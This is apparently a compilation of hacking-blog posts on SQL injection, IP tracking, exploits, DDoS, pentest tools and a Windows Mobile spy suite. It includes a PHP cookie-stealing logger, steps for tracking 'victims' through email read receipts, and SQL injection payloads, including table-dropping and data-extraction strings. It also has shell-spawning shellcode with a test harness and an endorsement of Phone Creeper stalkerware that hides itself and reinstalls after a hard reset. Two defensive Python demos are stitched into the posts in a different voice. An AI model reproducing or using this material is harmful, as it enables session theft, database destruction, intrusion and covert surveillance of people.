
Hacker Used SQL-injection to Get 675K Credit Card

A computer hacker from Georgia has pleaded guilty to fraud and identity theft after authorities found him with more than 675,000 stolen credit card accounts on his home computers. Credit card companies have traced more than $36 million in fraudulent transactions to the accounts that were breached by Rogelio Hackett.
How did he do it? In brief, the hacker used SQL injection attacks on web resources; he was able to exploit different SQL vulnerabilities even though this kind of vulnerability is well known. SQL injection is one of the popular attacks on a web application's backend database. Unlike an XSS vulnerability, where the attacker uses JavaScript to target the client browser, SQL injection targets the SQL statement being executed by the application on the backend database.
Hackers usually identify a SQL injection vulnerability by adding invalid or unexpected characters to a parameter value and watching for errors in the application's response. For example:
http://www.example.com/users.asp?id=mark'
If the request generates an error, it is a good indication of a mishandled quotation mark, and the application may be vulnerable to SQL injection attacks. I think that automated tools can do a fast job of checking for these vulnerabilities, such as Havij, a very fast tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page.
SQL injection attacks take advantage of poorly written web applications that write data directly into the database. In fact, SQL injection does not depend on the application language: programming mistakes allow SQL injection in almost any programming language.
That's why it is very important to conduct application black-box penetration testing, as this can reveal OWASP Top 10 application vulnerabilities, including SQL injection, parameter manipulation, cookie poisoning, and XSS.
An attacker who wishes to grab usernames and passwords might try phishing and social engineering attacks against an application's users. On the other hand, hackers can try to pull everyone's credentials directly from the database.

Hacking A Biometric System



Description: This paper was presented at NullCon 2011:
"Penetration Testing Biometrics Systems"

You can read the detailed paper by following the link below.

PDF version: http://www.fb1h2s.com/Null_Biometrics.pdf

HOW TO GET IP ADDRESS EASILY

I have been getting requests that the content we are posting is not easy for beginners. I was a little disappointed with such a review, so here we go: a simple yet effective post about the very basics of the internet and networking, the IP address.




What is an IP address?
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted-quad') and look something like 112.123.123.121 (this is an example of IPv4).


What can be done with an IP address?

The IP address is the very basic unit before you start a hack. It's basically used for fingerprinting and tracing, and if the victim is weak it won't take 10 secs to penetrate through a vulnerability :)




HOW can I get an IP address?

It's an easy task to get your own as well as others' IP addresses.
To get your own IP address just go to this website


How to get the IP of a website?
Go to a shell (command prompt) and just type ping www.target.com
and it will start showing numbers, just like in this picture


How to get IP address of friends or victims?

Using E-mail receipts


An e-mail receipt is a kind of notification you get as an e-mail when someone opens (reads) the mail sent by you.

This notification consists of
  • IP address of the mail reader.
  • Time and date of reading the mail.
  • Name and version of his browser.

You need to follow these steps


a. Step 1:-

Visit readnotify and sign up there. You can use your Gmail, Yahoo, Hotmail, Rediff or any other email id. They give free trials for 2 weeks or 25 emails, whichever comes first.

b. Step 2:-

Let's say you have used your email id example@gmail.com to register on readnotify.com; then log in to your email account first.

c. Step 3:-

Click on the Compose mail menu and in the To: section write the email id of the culprit followed by readnotify.com, so the complete email address would be like victim@gmail.com.readnotify.com. The rest is just the normal procedure of email.

d. Step 4:-

You are done. Just wait for the victim to open that email and voilà, you will get the details.
 

Using PHP scripts

Here is the basic PHP script
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: http://google.com/")
?>
Process: save it on your hosting (ripway, my3gb, blackapplehost etc.). Don't forget to create a file.txt file, which will save all the IPs.

This will save IPs with the date, time and where the link came from, plus you can redirect to another URL, just like I redirected to Google, in a matter of seconds.

The upcoming post will be on fingerprinting with an IP address so we can work with a flow.

Do share your views on this post; I tried to keep it simple.

WEAKERTHAN LINUX FOR HACKERS

Most of you will have heard about BackTrack, but it's not the only one in the business. Weakerthan is another Linux-based pentesting distro which is really good. Weakerthan is my second favorite after BackTrack.


Intro:


WeakNet Linux is designed primarily for penetration testing, forensic analysis and other security tasks. The default desktop environment is GNOME.

The tools I have selected are tools we use all the time here. As I said, if you find some that you want in it, please let me know. The image is about 1GB, meaning it will have to be on DVD, meaning I can't host it here without risk of bandwidth dying! I need a place to upload it to. Some code written by WeakNet Labs Assistants from this site that is preinstalled:

* BRuWRT-FORSSE v2.0
* Easy-SSHd
* Web-Hacking-Portal v2.0
* Perlwd
* Netgh0st v3.0
* YouTube-Thief!
* Netgh0st v2.2
* DomainScan
* ADtrace
* Admin-Tool
* Tartarus v0.1
* and much more..


A really good GUI plus vulnerable applications to test our hacking skills.


My personal experience with WeakNet was really good and it's worth it.


WEAKERTHANv2 WeakNet Linux 5 - ISO ~684MB 
WeakNet Linux Complete Administration Guide 

WHAT IS LINUX

As you move in this world of hacking, you will realise the importance of Linux for hackers, programmers and geeks.

I won't go deep here on hackersbay; for more tutorials and the functioning of Linux you can refer to our sister site

What exactly is Linux & its importance


Linux is an operating system based on Unix. Some other common operating systems are Unix (and its variants BSD, AIX, Solaris, HP-UX, and others); DOS; Microsoft Windows; Amiga; and Mac OS.

Linux was originally created by Linus Torvalds with the assistance of developers from around the globe. Linux is free to download, edit and distribute. Linux is a very powerful operating system and it is gradually becoming popular throughout the world.

The world's fastest supercomputer uses Linux, so you can realise how powerful Linux can be.

Linux is a free operating system, not like Windows where you have to pay thousands of $$, costing half of the hardware of the PC. Linux is open source, which means anyone can edit it legally as per his/her convenience.

There are many distributions of Linux available: Ubuntu, Mandriva, Fedora, openSUSE, Mint etc.


But its desktop market share is 7-15% because it's not easy to use, but once you get in the habit of it I bet you'll spit on Windows.

  Advantages Of linux

1) BETTER SECURITY THAN WINDOWS -- Nowadays you can easily see Windows remote exploits flying around. Yes, Windows is easy to attack as compared to Linux.

2) RESOURCES AVAILABLE BY DEFAULT -- Many software add-ons and drivers are already installed on it.

3) GOOD FOR HACKING -- There are distributions specially designed for hackers: BackTrack, WeakNet, Blackbuntu, secmic etc.

4) IT'S FREE, NOT LIKE WINDOWS (WHO WILL PAY THOUSANDS OF $$)
The only Linux which costs some pennies is Red Hat.

5) LIVE CD -- One of the best features: you can run it without even affecting your HD.

DISADVANTAGES

1) NOT MANY S/W companies support Linux-based software.

2) NOT AS EASY AS WINDOWS -- It's command based and requires tweaking.

3) EXE SUPPORT -- The basic exe extension is not supported, but you can run them via WINE.


What about beginners? Where to start from

Well, I would suggest Ubuntu (only Linux for humans), as it has the largest community support, so if you have any problem it can be easily resolved, and it's a much more user-friendly Linux.

Grab these 2 books: Linux Bible and Ubuntu Unleashed. These books have good data on Linux and Ubuntu if you want to learn Linux more deeply.


We won't post Linux tweaks and tutorials on hb; you can find them on basicgeeks.com

Upcoming updates: Linux distributions for hackers :)




Do share the post with your friends.

Websecurify Security Testing Framework



Websecurify is a powerful web application security testing platform designed from the ground up to provide the best combination of automatic and manual vulnerability testing technologies.

Some of the main features of Websecurify include:

  • Available for all major operating systems (Windows, Mac OS, Linux)
  • Simple to use user interface
  • Built-in internationalization support
  • Easily extensible with the help of add-ons and plugins
  • Exportable and customisable reports with any level of detail
  • Modular and reusable design
  • Powerful manual testing tools and helper facilities
  • Powerful analytical and scanning technology
  • Scriptable support for JavaScript and Python
  • Extensible via many languages including JavaScript, Python, C, C++ and Java 



You can download Websecurify here

QuickRecon: Simple Information Gathering Python Script

QuickRecon is a simple information gathering tool, that allows you to:
  • Find subdomain names
  • Perform zone transfer
  • Gather emails from Google.com and Bing.com
For those who don't know, a DNS zone transfer is a type of DNS transaction that allows us to replicate the databases containing the DNS data across a set of DNS servers. Zone transfer comes in two flavors, full (opcode AXFR) and incremental (IXFR). AXFR stands for Asynchronous Full Transfer Zone and IXFR stands for Incremental Zone Transfer. This simple Python script depends on the DNS toolkit 'dnspython' while performing a zone transfer.


The e-mail gathering feature of this tool can also be used in a lot of ways – to learn about possible targets for account brute force, social engineering, etc.


The best part about this script is that it is cross compatible with multiple operating systems. It has been successfully tested on Windows XP and BackTrack 4 R2 with a Python 2.x installation.


Sample usage:
Obtaining subdomain names (built-in dictionary):
python quickrecon.py -m s -d example.com -o out.log


or (an external dictionary):
python quickrecon.py -m s -d example.com -i your_subdomains.txt


Zone Transfer:
python quickrecon.py -m z -d example.com


Gathering emails from Google.com and Bing.com:


python quickrecon.py -m e -d example.com -o out.log
python quickrecon.py -m e -d example.com -l 500
(quickrecon-0.2.zip) here.

Trojan to Disable Cloud-Based Antivirus--BOHU

A recent blog entry from the Microsoft Malware Protection Center details information about a new malware (called Win32/Bohu.A) which is specifically designed to disable and mislead cloud-based antivirus software.
Cloud-based antivirus software differs from traditional antivirus software in that the antivirus client (running on the PC) sends important threat data to a server for backend analysis, and subsequently receives further detection and removal instruction.


The Bohu Trojan originates in China, where there is predominant use of cloud-based antivirus software. Once a Windows-based machine is infected, the malware installs different network-level filters to disrupt and block the antivirus client from accessing the backend antivirus services on the Internet.
As well as writing random data at the end of its key payload components to avoid hash-based detection, Bohu also installs a Windows Sockets service provider interface (SPI) filter to block the antivirus network traffic as well as a Network Driver Interface Specification (NDIS) filter. The NDIS filter then stops the antivirus client from uploading data to the server by looking for the server addresses in the data packets.

WordPress Releases Security Hardening Update

The WordPress project has announced the release of WordPress 3.0.5. Dubbed a security hardening release, it is an essential update for those with any untrusted user accounts, but it also comes with other important security enhancements and hardening for all WordPress installations.
Two cross site scripting bugs have been squashed:
  • Properly encode title used in Quick/Bulk Edit, and offer additional sanitization to various fields. Affects users of the Author or Contributor role.
  • Preserve tag escaping in the tags meta box. Affects users of the Author or Contributor role.
Also included in 3.0.5 are two security enhancements, one of which improves the security of any plugins which were not properly leveraging the WordPress security API.
All WordPress administrators are encouraged to upgrade to this latest version. You can update automatically from the Dashboard > Updates menu in your site's admin area or download 3.0.5 directly.

WhatWeb-Next Generation Web Explorer

Introduction

Identify content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries, servers and more. When you visit a website in your browser the transaction includes many unseen hints about how the webserver is set up and what software is delivering the webpage.
Some of these hints are obvious, eg. “Powered by XYZ” and others are more subtle. WhatWeb recognises these cues and reports what it finds.

WhatWeb has over 250 plugins and needs community support to develop more. Plugins can identify systems with obvious identifying hints removed by also looking for subtle clues. For example, a WordPress site might remove the tag but the WordPress plugin also looks for “wp-content” which is less easy to disguise. Plugins are flexible and can return any datatype, for example plugins can return version numbers, email addresses, account ID’s and more.

There are both passive and aggressive plugins. Passive plugins use information on the page, in cookies and in the URL to identify the system. A passive request is as lightweight as a simple GET / HTTP/1.1 request. Aggressive plugins guess URLs and request more files. Plugins are easy to write; you don't need to know Ruby to make them.

Example Usage

I tested a simple command on our sister site www.basicgeeks.com and the result was good

Log Output

There are currently 3 types of log output. They are:
--log-brief Brief logging. Default output
--log-full Full logging. Complete output from each plugin
--log-xml XML logging. Same information as default output but in XML format
You can output to multiple logs simultaneously by specifying multiple command line logging options.

You can download WhatWeb here

What Is Ddos Attack And How Does It Work?





Many people are under the illusion that website hacking and attacking is very difficult and only some hackers and professionals can do it... Now that's absolutely wrong thinking... It's as easy as the alphabet.


First of all we should all know the different methods of attacking websites...
There are generally three methods of attacking a website...

1. DDoS attack
2. Shell scripts attack
3. JavaScript attack or attack through scripting.

Note: SQL and other techniques come under the hacking websites part, not the attacking part. Attacking is simply for fun or for intentionally causing damage to the website.

Ddos Attack



What is a Distributed Denial of Service (DDoS) attack?

Have you ever tried to make a telephone call but couldn't because all the telephone circuits were busy? This may happen on a major holiday and often happens on Diwali, New Year etc.

The reason you couldn't get through is because the telephone system is designed to handle a limited number of calls at a time.

So by now you will have got an idea of what a DDoS (Distributed Denial of Service) attack is.
Basically a DDoS attack is an attack which makes the network so congested that no further requests are delivered.

This is done by making a number of connections to the website through different computers or networks. It can also be done from one computer by making connections through different ports, as there are 64k ports available in Windows OS.


How Does an Attacker Launch a DDoS Attack?

Over the past years denial of service attacks have caused a huge amount of damage; many have been victims of this attack.

It's real. On February 6th, 2000, the Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.

This attack also recently hit Twitter on 6th August 2009. A lot of people had trouble logging on to Twitter. It was brought down by a denial of service attack; they tied up its servers so no one could log on to it. Websites like Facebook, eBay etc. have also been victims of this attack.

First, Attackers build a network of computers that will be used to produce the volume of traffic needed to deny services to computer users. We'll call this an "attack network".

To build this attack network, Attackers look for computers that are poorly secured, such as those that have not been properly patched, or those with out-of-date or non-existent anti-virus software. When the Attackers find such computers, they install new programs on the computers that they can remotely control to carry out the attack.

These days, however, the process of building an attack network has been automated through self-propagating programs. These programs automatically find vulnerable computers, attack them, and then install the necessary programs. The process begins again as those newly compromised computers look for still other vulnerable computers.

Once an attack network is built, the intruder is ready to attack the chosen victim or victims. Some information security experts believe that many attack networks currently exist and are dormant, passively waiting for the command to launch an attack against a victim's computers. Others believe that once a victim has been identified, the attack network is built and the attack launched soon afterward.

So guys, I think this is enough for today. I hope you are all now familiar with the DDoS attack. In a future post we will show how to do DDoS attacks with various hacking tools like Serve Attack Pro and LOIC (Low Orbit Ion Cannon) and other exploits.

And if you want to try DDoS then comment here and tools will be delivered to your inbox.

Make Your Own Anonymous Email Service


Do you want to send an email anonymously because, for example, you fear your views might not be appreciated by your boss? When avouching your opinion in public — critically important under more favorable circumstances — is unhealthy, anonymity becomes vital. Here I will show you how to set up your own anonymous email service. I am writing this post because there are some things that must be said, even when the speaker must remain anonymous. Let's start:


1) First of all you need to find a free hosting service that supports PHP and SendMail. Here is one that works perfect, and without ads: x10hosting.com. Create an account there.

2) Now open notepad and paste this PHP code: the code

For some reason I am not going to give the code here; just write your email in a comment and the code will be sent to your mail.


3) Save it anywhere you want as mail.php, then upload it to the host you created (x10hosting) via FTP.

4) Now we are done. Just go to yourname.x10hosting.com/mail.php, and start sending your fake emails.

Why sending anonymous emails is important:

* Anonymously report sensitive information to the media

* Send crime tips to law enforcement agencies anonymously

* Report wrongdoing or theft at the workplace

* Voice concerns to school principals anonymously

* Report child or any other abuse

* Initiate an anonymous chat discussion

* Share suspicions regarding a friend or loved one

What Is SQL Injection & How Does It Work




SQL injection is the most common methodology employed by hackers to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that expose unauthorized data/information to a user. SQL injection occurs when user input is incorrectly filtered for embedded SQL statements.

SQL injection vulnerabilities have three forms:


Incorrectly filtered special characters: escape characters

This form of SQL injection occurs when the user manipulates the SQL statement using characters such as '. For instance, consider that you need to enter a username and password while logging into your account. The SQL statement generated will be:
"SELECT * FROM users WHERE password = '" + password + "';"

Now suppose the username and/or password entered is "' or '1'='1". Then the SQL statement reaching the back end will be:

"SELECT * FROM users WHERE password = '' or '1'='1';"

Look closely at this statement. The database reads it as: select everything from the table "users" where the password field equals '' or '1'='1'. During the authentication process this condition will always be valid, as 1 always equals 1. This way the user is given unauthorized access.

A list of some important inputs used by hackers in the SQL injection technique:
a) ' or 'a'='a
b) ' or 1=1 --
c) ' or 1=1; --
d) '; select * from *; --
e) ' (single quote) (here we look at the error)
f) '; drop table users --

On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of "username" in the statement below would cause the deletion of the "users" table as well as the selection of all data from the "data" table (in essence revealing the information of every user):
a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '%

Incorrectly handling input data type

This form of SQL injection occurs when the user input is not strongly typed, i.e. the input by the user is not checked against a data type constraint. For example, consider a field where you are asked to enter your phone number. Since the phone number input is of numeric data type, the input must be checked to see whether it is numeric or not. If it is not checked, the user can send alphanumeric input and embedded SQL statements. Consider the following SQL statement:
"SELECT * FROM user WHERE telephone = " + input + ";"
Now if I can input alphanumeric data, say "11111111;DROP TABLE user", then I have embedded an SQL statement to delete the entire table "user". This might prove detrimental to the company!!!
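The first two forms above, run side by side with their fixes, as an added example that is not code from the original post. Python's built-in sqlite3 stands in for the application's database, the table rows are constructed, the function names are hypothetical, and the second input uses the table name "users" to match the sample table.

```python
import re
import sqlite3


def make_db():
    """In-memory database holding constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users (
            id INTEGER PRIMARY KEY,
            username TEXT, password TEXT, telephone INTEGER
        );
        INSERT INTO users (username, password, telephone) VALUES
            ('alice', 'correct-horse', 5550100),
            ('bob',   'hunter2',       5550101);
        """
    )
    return db


def table_exists(db, name):
    rows = db.execute(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = ?",
        (name,),
    ).fetchall()
    return rows[0][0] == 1


# --- Form 1: quote characters reach the statement unescaped -----------------

def login_vulnerable(db, password):
    # Same construction as the article: the input is pasted between quotes.
    query = "SELECT username FROM users WHERE password = '" + password + "';"
    return sorted(row[0] for row in db.execute(query))


def login_parameterized(db, password):
    # The value travels separately from the SQL text, so a quote in the input
    # is plain data and cannot terminate the string literal.
    query = "SELECT username FROM users WHERE password = ?"
    return sorted(row[0] for row in db.execute(query, (password,)))


# --- Form 2: a numeric field that is never checked for its type -------------

def phone_lookup_vulnerable(db, phone):
    # executescript() stands in for a backend that accepts several statements
    # per request; it returns no rows, only the side effect matters here.
    db.executescript("SELECT * FROM users WHERE telephone = " + phone + ";")


def phone_lookup_checked(db, phone):
    # Enforce the data type first, then still bind the value as a parameter.
    if not re.fullmatch(r"[0-9]{1,15}", phone):
        raise ValueError("telephone must contain digits only")
    query = "SELECT username FROM users WHERE telephone = ?"
    return sorted(row[0] for row in db.execute(query, (int(phone),)))


def demo():
    quote_input = "' or '1'='1"                # input quoted in the article
    typed_input = "11111111;DROP TABLE users"  # article's input, table renamed
    db = make_db()
    results = {
        "vulnerable_login": login_vulnerable(db, quote_input),
        "parameterized_login": login_parameterized(db, quote_input),
    }
    try:
        phone_lookup_checked(db, typed_input)
        results["checked_lookup"] = "accepted"
    except ValueError:
        results["checked_lookup"] = "rejected"
    results["table_before"] = table_exists(db, "users")
    phone_lookup_vulnerable(db, typed_input)
    results["table_after"] = table_exists(db, "users")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The parameterized login returns no rows for the quoted input because the whole string is compared with the stored password as a value; the checked lookup refuses the second input before any SQL is built.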

If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:

1. ' having 1=1 --
2. ' group by user.id having 1=1 --
3. ' group by users.id, users.username, users.password, users.privs having 1=1--
4. ' union select sum(users.username) from users--
5. ' union select sum(id) from users --

Vulnerabilities inside the database server

Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server's real_escape_chars() functions.
If the database server is not properly configured, then access to the database can easily be found by the hacker.
The hacker can get information regarding the database server using the following input:
' union select @@version,1,1,1--

1. Extended Stored Procedure Attacks
2. sp_who: this will show all users that are currently connected to the database.
3. xp_readmail, , , , ,@peek=’false’ : this will read all the mails and leave the message as unread.

In the same way, there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in a software application at the database layer.

So guys, I think now you should be absolutely aware of what SQL injection is, so in my next post we will discuss how to hack a website's database or a website using this method.

What is exploit and how to use it?



What is an exploit

An exploit is a computer program which circumvents computer security. There are many ways to exploit security holes. If a computer programmer makes a programming mistake in a computer program, it is sometimes possible to circumvent security. The coding of such programs, which attack (hack) the programming mistakes or security holes, is the art of exploitation or exploit coding. Some common exploiting techniques are stack exploits, heap exploits, format string exploits, ...


What is a stack exploit

A stack exploit occurs if you can write more than the size of a buffer located on the stack into this buffer. If you can write more data than the size of the buffer (more than 1024 bytes in this example), a stack overflow occurs. For example:

#include <string.h>

int main(int argc, char **argv)
{
// This buffer is located on the stack
char buf[1024];
// i is located on the stack
int i;

// A 6 byte stack buffer overflow
for(i=0;i<1030;i++) buf[i] = 'A';

// Another example
// if argv[1] is larger than 1024 bytes an overflow occurs
strcpy(buf, argv[1]);
}

Why is a stack overflow a security threat?

The assembler instruction 'call' pushes the return address onto the stack. 'call' jumps into a function; in our example the function is main. If the function returns with the assembler instruction 'ret', it returns to the function pointer on the stack. If you can overflow the stack you can overwrite the return address located on the stack. You can return to another location. The location should be a pointer to a shellcode address. Read alephonestack.txt for more information. You can download it at my papers section.

What is a shellcode

Shellcode are machine instructions, which launch a shell for example. A shellcode looks like this:

char shellcode[]="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
"\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80";

Every char is a machine instruction. \xcd\x80 is 'int 80' for example. After an overflow occurs we need an address to return to. This shellcode launches a shell. If you point to the shellcode (after a stack overflow, for example), the machine instructions are executed and spawn a shell. Compile this program. It tests the shellcode and spawns a shell:

// Compile this program with gcc sctest.c -o sctest and start it: ./sctest
// now you have something like
// sh-2.03$

#include <stdio.h>

char shellcode[]=
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
"\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80";
int
main()
{
// Function pointer that will point at the byte array
void (*dsr) ();
dsr = (void (*)()) shellcode;
printf("Size: %d bytes.\n", (int) sizeof(shellcode));
dsr();
}

Read alephonestack.txt for basic shellcode coding.

What are heap overflows

If a buffer on the heap is overflowed, a heap buffer overflow occurs.
A heap overflow looks like this:

#include <stdlib.h>
#include <string.h>

// It dynamically creates a 1000 byte buffer on the heap.
int main(int argc, char **argv)
{
// pointer points to a heap address
char *pointer = malloc(1000);
char *pointer2 = malloc(200);

// Overflowed, if argv[1] is larger than 1000 bytes.
// The buffer pointer2 is overflowed if pointer
// contains more than 1000 bytes.
strcpy(pointer, argv[1]);

// Free dynamically allocated data
free(pointer);
free(pointer2);
}


Format String exploits?

If you control the format string in one of the printf, syslog or setproctitle functions, exploitation is possible. Format strings are something like "%s", "%x", "%d", ... For example:

#include <stdio.h>

int main(int argc, char **argv)
{
char *buf = "TEST";

// The wrong way
// The user can control the format string
printf(argv[1]);

// You should code:
// (a fixed format string; the user input is only an argument)
printf("%s", argv[1]);
}

Facebook unveils security tools after Zuckerberg's page hacked

Facebook today announced two new security measures -- wider use of HTTPS and the introduction of "social authentication" -- less than 24 hours after the Facebook page of company founder Mark Zuckerberg was defaced by a hacker.

A blog post by Facebook's Alex Rice ties the security announcement to Friday being "Data Privacy Day," but the press and bloggers are having a high time connecting the news and Zuckerberg's victimization, whether or not there is actually any connection.

The first new security measure involves expanding the use of HTTPS -- Hypertext Transfer Protocol Secure -- beyond password exchanges.

Rice writes: "Starting today we'll provide you with the ability to experience Facebook entirely over HTTPS. You should consider enabling this option if you frequently use Facebook from public Internet access points found at coffee shops, airports, libraries or schools. The option will exist as part of our advanced security features, which you can find in the 'Account Security' section of the Account Settings page."

The second measure is a captcha-like authentication mechanism that instead of relying on illegible printed words employs photographs of a Facebook user's own friends.
Rice continues: "Instead of showing you a traditional captcha on Facebook, one of the ways we may help verify your identity is through social authentication. We will show you a few pictures of your friends and ask you to name the person in those photos. Hackers halfway across the world might know your password, but they don't know who your friends are."
Meanwhile, Facebook has remained officially mum regarding yesterday's apparent hacking incident that saw someone insert a message onto Zuckerberg's Facebook fan page, which has attracted 2.8 million Facebook users. While it was removed relatively quickly, some 1,800 of those users managed to "like" the page and more than 400 left comments beforehand. The message read:
"Let the hacking begin: If facebook needs money, instead of going to the banks, why doesn't Facebook let its users invest in Facebook in a social way? Why not transform Facebook into a 'social business' the way Nobel Price [sic] winner Muhammad Yunus described it? #hackercup2011"

As of this writing, Zuckerberg's page remains disabled.

How Antivirus Software identifies threats

Most of us are aware of how antivirus works and updates. With the ever increasing threat from viruses and other malicious programs, almost every computer today comes with pre-installed antivirus software on it. In fact, an antivirus has become one of the most essential software packages for every computer. Even though every one of us has antivirus software installed on our computers, only a few really bother to understand how it actually works and updates.


An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs.

1. Signature-based detection – Dictionary based
2. Heuristic-based detection – Suspicious behavior based

1. Signature-based detection – Dictionary based

This is the most commonly employed method, and it involves searching for known virus patterns within a given file. Every antivirus product keeps a dictionary of sample malware code, called signatures, in its database. Whenever a file is examined, the antivirus compares its contents against the sample code in that dictionary. If a piece of code within the file matches one in the dictionary, the file is flagged and action is taken immediately to stop the virus from replicating further. The antivirus may choose to repair the file, quarantine it or delete it permanently, based on its potential risk.

As new viruses and malware are created and released every day, this method of detection cannot defend against new malware until samples have been collected and signatures released by the antivirus software company. Some companies also encourage users to upload new viruses or variants, so that the virus can be analyzed and its signature added to the dictionary.

The more regular the updates, the more secure we are.

2. Heuristic-based detection – Suspicious behavior based

Heuristic-based detection involves identifying suspicious behavior in any given program that might indicate a potential risk. This approach is used by some sophisticated antivirus software to identify new malware and variants of known malware. Unlike the signature-based approach, here the antivirus doesn't attempt to identify known viruses, but instead monitors the behavior of all programs.

File emulation – This is another type of heuristic-based approach, where a given program is executed in a virtual environment and the actions it performs are logged. Based on the logged actions, the antivirus software can determine whether the program is malicious and carry out the necessary actions to clean the infection.

How to check whether your antivirus does the work you hired it for?

The European Institute of Computer Antivirus Research (EICAR) test makes it easy. It is a common test, and most of us can perform it right now!
1. Open Notepad (New Text Document.TXT), copy the following code exactly into it, and save the file.
EICAR Test Code:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

2. Rename the file from New Text Document.TXT to mynewfile.com
3. Now run the antivirus scan on this mynewfile.com file.

If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise find a new one.
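
The dictionary lookup described under signature-based detection, run against the EICAR string, as an added example (not code from any antivirus product). The SignatureDB class, the signature names and the "new sample" bytes are constructed for illustration.

```python
import hashlib

# EICAR test string, assembled from two halves so this source file does not
# itself contain the contiguous 68-byte signature.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-" + rb"STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

class SignatureDB:
    """Hypothetical signature dictionary; real engines use richer formats."""
    def __init__(self):
        self._sigs = []  # (name, kind, value); kind is "sha256" or "bytes"

    def add_sample(self, name, sample, kind="bytes"):
        # The vendor's step: derive a signature from a collected sample.
        value = hashlib.sha256(sample).hexdigest() if kind == "sha256" else sample
        self._sigs.append((name, kind, value))

    def scan(self, data):
        """Return the names of all signatures that match `data`."""
        digest = hashlib.sha256(data).hexdigest()
        hits = []
        for name, kind, value in self._sigs:
            if kind == "sha256" and value == digest:    # whole-file match
                hits.append(name)
            elif kind == "bytes" and value in data:     # pattern inside file
                hits.append(name)
        return hits

def demo():
    db = SignatureDB()
    db.add_sample("EICAR.hash", EICAR, kind="sha256")
    db.add_sample("EICAR.pattern", EICAR)
    # Constructed stand-in for a sample the vendor has not analysed yet.
    new_sample = b"constructed stand-in for an unseen sample"
    results = {
        "exact": db.scan(EICAR),
        "padded": db.scan(EICAR + b"\r\n"),   # editor added a trailing newline
        "benign": db.scan(b"hello world"),
        "unknown_before": db.scan(new_sample),
    }
    db.add_sample("Constructed.NewSample", new_sample)  # signature update
    results["unknown_after"] = db.scan(new_sample)
    return results

if __name__ == "__main__":
    for case, hits in demo().items():
        print(f"{case:15} -> {hits or 'clean'}")
```

The "padded" case shows why a whole-file hash alone is brittle, and the "unknown" pair shows why a scanner is only as good as its last signature update.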

Backtrack vs Windows 7

I was watching some video presentations and luckily I found this one :)
This is a vocal difference between Windows 7 and BackTrack, a bit on the funny side but worth watching...


Hyenae: A Platform Independent Network Packet Generator

Hyenae is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant.
Hyenae can be used to reveal potential security vulnerabilities of your network. Besides smart wildcard-based address randomization, a highly customizable packet generation control, and an interactive attack assistant, Hyenae comes with a clusterable remote daemon for setting up distributed attack networks.
Hyenae is used by security experts to protect their own networks by attacking them before someone else does. The tool can be used to evaluate how new security devices react to different types of attacks, and for proofs of concept against the web applications, network applications, database applications and other customized applications in your environment.
In short, Hyenae can be used for stress testing different applications and devices.

Note: this tool might look like just another tool, but don't go by looks; it's really powerful and flexible.


Download Hyenae v0.36-1 (hyenae-0.36-1.tar.gz/hyenae-0.36-1_fe_0.1-1-win32.exe) here.

Phone Creeper: A Windows Phone Espionage Suite

For some time now, there have been spy apps for Symbian phones and BlackBerrys too! Surprisingly, there were none for the Windows Mobile operating system, all the more so because applications like these are sold for a fee. Phone Creeper will change it all!

Phone Creeper is a phone espionage suite that has been actively developed for some time now. It can be silently installed by just inserting an SD card with the files included in the package. As is the requirement of all spy tools, the program does not show up under installed programs or running programs and allows for a useful array of features. Best of all, phones running this software can be remotely controlled by text messages! This could ensure a longer battery life, as it does not need a Bluetooth or infrared connection. Plus, with BT and IR, you need to be within a fixed radius to get the best results. Yes, this does add to the text messaging costs, and if the user were to grow suspicious of rising bills, chances are that this tool could be removed from the phone. But, worry not! By default, this program will silently reinstall itself even after a hard reset, if the memory card with these files is still in the device. As long as the memory card is not formatted, this feature will help us a lot!

All commands will be silently received and deleted immediately and results will be issued back to sender. Pre-configured settings can be added to the installer to have your own default password and phone number to receive live updates. It does all the normal spy stuff – get phone records, get GPS info etc.

These are the commands that you can possibly use to err spy on someone:


The mother of all commands:
password FTPgetcalllogs - To receive any log by FTP, you can pre-seed any get com
By default, the password is set to the creator's name – chetstriker. So, you will have to reset it to something of your choice before actively using it.
If only there was a command to stop the text messaging counter to be fixed to a certain number! :P I have never used a Windows Mobile and so this was a first for me when I got to know that the WM phone has FTP too!
If you infect yourself by accident, the author has been gracious enough to provide a Phone Creeper uninstaller too!
